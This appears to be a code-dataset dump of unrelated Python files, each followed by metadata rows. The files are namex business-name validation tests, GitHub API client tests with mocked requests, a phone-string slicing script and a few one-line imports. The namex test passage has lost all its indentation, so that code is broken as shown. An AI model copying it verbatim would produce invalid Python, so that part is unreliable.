{'word': 'EQTEC', 'classification': 'DIST'}]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': '4H',
'consent_required': True, 'allow_use': True
},
{
'words': 'CONSULTING ENGINEER, ENGINEER, ENGINEERING, INGENIERE, INGENIEUR, INGENIEUR CONSIEL, P ENG, PROFESSIONAL ENGINEER',
'consent_required': True, 'allow_use': True
},
{
'words': 'HONEYWELL',
'consent_required': True, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'BLAKE 4H ENGINEERING LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'EQTEC HONEYWELL ENGINEERING LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.NAME_REQUIRES_CONSENT, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_existence_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.DESIGNATION_NON_EXISTENT, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_existence_incomplete_designation_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG PLUMBING SOCIETE A RESPONSABILITE',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.TOO_MANY_WORDS, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_mismatch_one_word_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'},
{'word': 'BC', 'classification': 'DIST'},
{'word': 'BC', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': 'B C, B C S, BC, BC S, BCPROVINCE, BRITISH COLUMBIA, BRITISHCOLUMBIA, PROVINCIAL',
'consent_required': False, 'allow_use': True
},
{
'words': 'CO OP, CO OPERATIVES, COOP, COOPERATIVES',
'consent_required': False, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG PLUMBING COOP',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING COOPERATIVE',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': '468040 BC COOP',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING LLC',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG LLC PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING LLP',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING SLR',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING SENCRL',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING CCC',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING ULC',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG LTD PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.DESIGNATION_MISMATCH, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_mismatch_one_word_with_hyphen_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': 'CO OP, CO OPERATIVES, COOP, COOPERATIVES',
'consent_required': False, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG CO-OP PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG CO-OPERATIVE PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING L.L.C.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG L.L.C. PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING LIMITED LIABILITY CO.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.DESIGNATION_MISMATCH, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_mismatch_more_than_one_word_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG PLUMBING LIMITED LIABILITY COMPANY',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING SOCIETE A RESPONSABILITE LIMITEE',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING LIMITED LIABILITY PARTNERSHIP',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING COMMUNITY CONTRIBUTION COMPANY',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING UNLIMITED LIABILITY COMPANY',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.DESIGNATION_MISMATCH, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_misplaced_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG LTD. PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG INCORPORATED PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG LIMITED PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG INC. PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG CORPORATION PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG CORP PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG LTEE PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG INCORPOREE PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG LIMITEE PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.DESIGNATION_MISPLACED, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_name_use_special_words_request_response(client, jwt, app):
words_list_classification = [{'word': 'BC', 'classification': 'DIST'},
{'word': 'BC', 'classification': 'DESC'},
#{'word': '468040', 'classification': 'DIST'},
{'word': 'COAST', 'classification': 'DIST'},
{'word': 'COAST', 'classification': 'DESC'},
                                 {'word': 'TREASURY', 'classification': 'DIST'},
{'word': 'TREASURY', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': 'B C, B C S, BC, BC S, BCPROVINCE, BRITISH COLUMBIA, BRITISHCOLUMBIA, PROVINCIAL',
'consent_required': False, 'allow_use': True
},
{
'words': 'TREASURY',
'consent_required': False, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': '468040 BC LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'COAST ANGULARS TREASURY INCORPORATED',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.WORD_SPECIAL_USE, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_name_use_special_words_more_than_one_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'BIG', 'classification': 'DIST'},
{'word': 'BROS', 'classification': 'DIST'},
{'word': 'BROS', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': 'BIG BROS, BIG BROTHERS, BIG SISTERS',
'consent_required': False, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG BIG BROS PLUMBING LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.WORD_SPECIAL_USE, payload.get('issues'))
def save_words_list_classification(words_list):
from namex.models import WordClassification as WordClassificationDAO
for record in words_list:
wc = WordClassificationDAO()
wc.classification = record['classification']
wc.word = record['word']
wc.start_dt = date.today()
wc.approved_dt = date.today()
wc.save_to_db()
def save_words_list_virtual_word_condition(words_list):
from namex.models import VirtualWordCondition as VirtualWordConditionDAO
for record in words_list:
vwc = VirtualWordConditionDAO()
vwc.rc_words = record['words']
vwc.rc_consent_required = record['consent_required']
vwc.rc_allow_use = record['allow_use']
vwc.save_to_db()
def save_words_list_name(words_list):
from namex.models import Request as RequestDAO, State, Name as NameDAO
num = 0
req = 1460775
for record in words_list:
nr_num_label = 'NR 00000'
num += 1
req += 1
nr_num = nr_num_label + str(num)
nr = RequestDAO()
nr.nrNum = nr_num
nr.stateCd = State.APPROVED
nr.requestId = req
nr.requestTypeCd = EntityTypes.CORPORATION.value
name = NameDAO()
name.nr_id = nr.id
name.choice = 1
name.name = record
name.state = State.APPROVED
name.corpNum = '0652480'
nr.names = [name]
nr.save_to_db()
| 41.190259 | 137 | 0.560694 | 5,344 | 54,124 | 5.477358 | 0.069985 | 0.031362 | 0.03717 | 0.038263 | 0.872775 | 0.852038 | 0.838782 | 0.828089 | 0.823409 | 0.809778 | 0 | 0.004039 | 0.304615 | 54,124 | 1,313 | 138 | 41.22163 | 0.77368 | 0.042255 | 0 | 0.606005 | 0 | 0 | 0.251062 | 0.001718 | 0 | 0 | 0 | 0 | 0.079163 | 1 | 0.029117 | false | 0 | 0.009099 | 0 | 0.038217 | 0.045496 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c3adaf3ba357eb96bffdb6ccfcf29ff834072306 | 96 | py | Python | venv/lib/python3.8/site-packages/jeepney/auth.py | GiulianaPola/select_repeats | 17a0d053d4f874e42cf654dd142168c2ec8fbd11 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/jeepney/auth.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/jeepney/auth.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/0e/1d/e7/b73b82734ada7887160ccfc60c02cdc0ba94b9e24ce281071ffa424130 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.40625 | 0 | 96 | 1 | 96 | 96 | 0.489583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c3ccfb9da5d5050c40c755ab857c94d011ffdfde | 93 | py | Python | phone.py | vijay-krishnamoorthy/python-practice | 2028bccb03619b6ac50bdfdba270623f0bfb67a9 | [
"bzip2-1.0.6"
] | null | null | null | phone.py | vijay-krishnamoorthy/python-practice | 2028bccb03619b6ac50bdfdba270623f0bfb67a9 | [
"bzip2-1.0.6"
] | null | null | null | phone.py | vijay-krishnamoorthy/python-practice | 2028bccb03619b6ac50bdfdba270623f0bfb67a9 | [
"bzip2-1.0.6"
] | null | null | null | p = input()
print(p[:2] + "-" + p[2:])
p = p[:2] + "-" + p[2:]
print(p[3:])
p = p.replace('-', '')
print(p)
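The same slicing pipeline written as a pure function, which is easier to check than the interactive version (the function name is my own):

```python
def hyphenate(p):
    # Insert "-" after the first two characters, e.g. "0412345" -> "04-12345".
    return p[:2] + "-" + p[2:]

assert hyphenate("0412345") == "04-12345"
# Stripping the hyphen recovers the original string.
assert hyphenate("0412345").replace("-", "") == "0412345"
```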
| 13.285714 | 22 | 0.451613 | 20 | 93 | 2.1 | 0.3 | 0.190476 | 0.214286 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057471 | 0.064516 | 93 | 6 | 23 | 15.5 | 0.425287 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
c3eeea70fc0fc8aae95b99ed2c3e6027946ec9aa | 47 | py | Python | pyxb/bundles/opengis/fes_2_0.py | eLBati/pyxb | 14737c23a125fd12c954823ad64fc4497816fae3 | [
"Apache-2.0"
] | 123 | 2015-01-12T06:43:22.000Z | 2022-03-20T18:06:46.000Z | pyxb/bundles/opengis/fes_2_0.py | eLBati/pyxb | 14737c23a125fd12c954823ad64fc4497816fae3 | [
"Apache-2.0"
] | 103 | 2015-01-08T18:35:57.000Z | 2022-01-18T01:44:14.000Z | pyxb/bundles/opengis/fes_2_0.py | eLBati/pyxb | 14737c23a125fd12c954823ad64fc4497816fae3 | [
"Apache-2.0"
] | 54 | 2015-02-15T17:12:00.000Z | 2022-03-07T23:02:32.000Z | from pyxb.bundles.opengis.raw.fes_2_0 import *
| 23.5 | 46 | 0.808511 | 9 | 47 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 0.085106 | 47 | 1 | 47 | 47 | 0.790698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
615b748005e7d035268d8d9680b688a0ea54284b | 96 | py | Python | pymediator/__init__.py | pirobtumen/pymediator | fb6b5017301e8197c5c521ce87a396510fe55542 | [
"BSD-3-Clause"
] | null | null | null | pymediator/__init__.py | pirobtumen/pymediator | fb6b5017301e8197c5c521ce87a396510fe55542 | [
"BSD-3-Clause"
] | null | null | null | pymediator/__init__.py | pirobtumen/pymediator | fb6b5017301e8197c5c521ce87a396510fe55542 | [
"BSD-3-Clause"
] | null | null | null | from .mediator import Mediator
from .event import Event
from .event_handler import EventHandler
| 24 | 39 | 0.84375 | 13 | 96 | 6.153846 | 0.461538 | 0.225 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 96 | 3 | 40 | 32 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4eedb8e0eb1af53fab513b04a5589012d263b00a | 4,242 | py | Python | tests/namespaces/test_repos.py | odidev/aiogithubapi | ef0917e8da5d31f3c3e64d4efe45f05a537bcfdd | [
"MIT"
] | null | null | null | tests/namespaces/test_repos.py | odidev/aiogithubapi | ef0917e8da5d31f3c3e64d4efe45f05a537bcfdd | [
"MIT"
] | null | null | null | tests/namespaces/test_repos.py | odidev/aiogithubapi | ef0917e8da5d31f3c3e64d4efe45f05a537bcfdd | [
"MIT"
] | null | null | null | """Test repos namespace."""
# pylint: disable=missing-docstring
import pytest

from aiogithubapi import GitHubAPI, GitHubRepositoryModel
from aiogithubapi.const import HttpContentType
from tests.common import (
    HEADERS,
    HEADERS_TEXT,
    TEST_REPOSITORY_NAME,
    MockedRequests,
    MockResponse,
)


@pytest.mark.asyncio
async def test_get_repository(github_api: GitHubAPI, mock_requests: MockedRequests):
    response = await github_api.repos.get(TEST_REPOSITORY_NAME)
    assert response.status == 200
    assert isinstance(response.data, GitHubRepositoryModel)
    assert response.data.name == "Hello-World"
    assert mock_requests.called == 1
    assert mock_requests.last_request["url"] == "https://api.github.com/repos/octocat/hello-world"


@pytest.mark.asyncio
async def test_list_commits(github_api: GitHubAPI, mock_requests: MockedRequests):
    response = await github_api.repos.list_commits(TEST_REPOSITORY_NAME)
    assert response.status == 200
    assert isinstance(response.data, list)
    assert response.data[0].commit.message == "Merge pull request #6"
    assert mock_requests.called == 1
    assert (
        mock_requests.last_request["url"]
        == "https://api.github.com/repos/octocat/hello-world/commits"
    )


@pytest.mark.asyncio
async def test_list_tags(github_api: GitHubAPI, mock_requests: MockedRequests):
    response = await github_api.repos.list_tags(TEST_REPOSITORY_NAME)
    assert response.status == 200
    assert isinstance(response.data, list)
    assert response.data[0].name == "v0.1"
    assert response.data[0].commit.sha == "c5b97d5ae6c19d5c5df71a34c7fbeeda2479ccbc"
    assert mock_requests.called == 1
    assert (
        mock_requests.last_request["url"] == "https://api.github.com/repos/octocat/hello-world/tags"
    )


@pytest.mark.asyncio
async def test_tarball(
    github_api: GitHubAPI,
    mock_requests: MockedRequests,
    mock_response: MockResponse,
):
    mock_response.mock_headers = {**HEADERS, "content-type": HttpContentType.BASE_GZIP}
    response = await github_api.repos.tarball("octocat/hello-world")
    assert isinstance(response.data, bytes)
    assert mock_requests.called == 1
    assert (
        mock_requests.last_request["url"]
        == "https://api.github.com/repos/octocat/hello-world/tarball/"
    )

    response = await github_api.repos.tarball("octocat/hello-world", ref="main")
    assert isinstance(response.data, bytes)
    assert mock_requests.called == 2
    assert (
        mock_requests.last_request["url"]
        == "https://api.github.com/repos/octocat/hello-world/tarball/main"
    )


@pytest.mark.asyncio
async def test_zipball(
    github_api: GitHubAPI,
    mock_requests: MockedRequests,
    mock_response: MockResponse,
):
    mock_response.mock_headers = {**HEADERS, "content-type": HttpContentType.BASE_ZIP}
    response = await github_api.repos.zipball("octocat/hello-world")
    assert isinstance(response.data, bytes)
    assert mock_requests.called == 1
    assert (
        mock_requests.last_request["url"]
        == "https://api.github.com/repos/octocat/hello-world/zipball/"
    )

    response = await github_api.repos.zipball("octocat/hello-world", ref="main")
    assert isinstance(response.data, bytes)
    assert mock_requests.called == 2
    assert (
        mock_requests.last_request["url"]
        == "https://api.github.com/repos/octocat/hello-world/zipball/main"
    )


@pytest.mark.asyncio
async def test_readme(
    github_api: GitHubAPI,
    mock_requests: MockedRequests,
    mock_response: MockResponse,
):
    mock_response.mock_headers = HEADERS_TEXT
    response = await github_api.repos.readme(TEST_REPOSITORY_NAME)
    assert response.status == 200
    assert isinstance(response.data, str)
    assert mock_requests.called == 1
    assert (
        mock_requests.last_request["url"]
        == "https://api.github.com/repos/octocat/hello-world/readme/"
    )

    response = await github_api.repos.readme(TEST_REPOSITORY_NAME, dir="test")
    assert response.status == 200
    assert isinstance(response.data, str)
    assert mock_requests.called == 2
    assert (
        mock_requests.last_request["url"]
        == "https://api.github.com/repos/octocat/hello-world/readme/test"
    )
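The archive-endpoint tests above all assert the same URL shape; a tiny sketch of that construction (the helper is mine, not part of aiogithubapi):

```python
def archive_url(repository, kind, ref=""):
    # e.g. kind="tarball", ref="main" -> .../tarball/main; an empty ref leaves
    # the trailing slash, matching the URLs asserted in the tests above.
    return f"https://api.github.com/repos/{repository}/{kind}/{ref}"

assert archive_url("octocat/hello-world", "tarball") == \
    "https://api.github.com/repos/octocat/hello-world/tarball/"
assert archive_url("octocat/hello-world", "zipball", "main") == \
    "https://api.github.com/repos/octocat/hello-world/zipball/main"
```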
| 34.209677 | 100 | 0.719236 | 513 | 4,242 | 5.783626 | 0.146199 | 0.097068 | 0.109201 | 0.066734 | 0.846983 | 0.836535 | 0.816987 | 0.772497 | 0.772497 | 0.698349 | 0 | 0.013563 | 0.165724 | 4,242 | 123 | 101 | 34.487805 | 0.824809 | 0.013201 | 0 | 0.52381 | 0 | 0 | 0.173206 | 0.009569 | 0 | 0 | 0 | 0 | 0.342857 | 1 | 0 | false | 0 | 0.038095 | 0 | 0.038095 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f6178b1a81e38b94879b7faab77a331d3e7a2bdb | 137 | py | Python | tests/test_basic.py | radoye/fastprogress | ee6234d1b22bb670a08e8c32cdbbc4cb4cba1d6c | [
"Apache-2.0"
] | 2 | 2018-12-31T06:08:58.000Z | 2019-01-03T10:11:14.000Z | tests/test_basic.py | radoye/fastprogress | ee6234d1b22bb670a08e8c32cdbbc4cb4cba1d6c | [
"Apache-2.0"
] | 1 | 2021-06-25T15:16:59.000Z | 2021-06-25T15:16:59.000Z | tests/test_basic.py | radoye/fastprogress | ee6234d1b22bb670a08e8c32cdbbc4cb4cba1d6c | [
"Apache-2.0"
] | 1 | 2018-12-30T10:35:51.000Z | 2018-12-30T10:35:51.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
import fastprogress
def test_basic():
    assert fastprogress.__version__
